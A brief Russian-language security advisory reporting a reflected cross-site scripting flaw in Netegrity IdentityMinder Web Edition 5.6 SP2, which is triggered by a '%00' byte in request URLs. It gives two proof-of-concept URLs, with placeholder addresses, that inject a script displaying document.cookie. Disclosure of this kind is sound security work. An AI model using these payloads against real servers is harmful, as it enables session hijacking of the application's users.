Программа: IdentityMinder Web Edition 5.6 SP2
Уязвимость в Netegrity IdentityMinder Web Edition позволяет удаленному пользователю выполнить XSS нападение.
Сервер не фильтрует HTML код в URL, который содержит '%00' символ.
Пример:
http://PUT_ADDRESS_HERE/idm/ PUT_SITE_NAME_HERE/ims_mainconsole_principalpo
puphandler.do?searchAttrs0=%25GROUP_NAME% 25&searchOperators0=EQUALS&searchFilter0=
&searchOrgDN=PUT_DN_HERE&incChildren OrgFlag=NO&resultsPerPage=10&oid=
&imsui_taskstate=RESOLVE_SCOPE& imsui_tpnametosearch=group &numOfExpressions=1%00<script>alert(document.cookie)
</script>
http://PUT_ADDRESS_HERE:7001/idmmanage/ mobjattr.do?diroid=PUT_OID_HERE &attrname=Group%20Members&mobjtype=2
<script>alert(document.cookie)</script>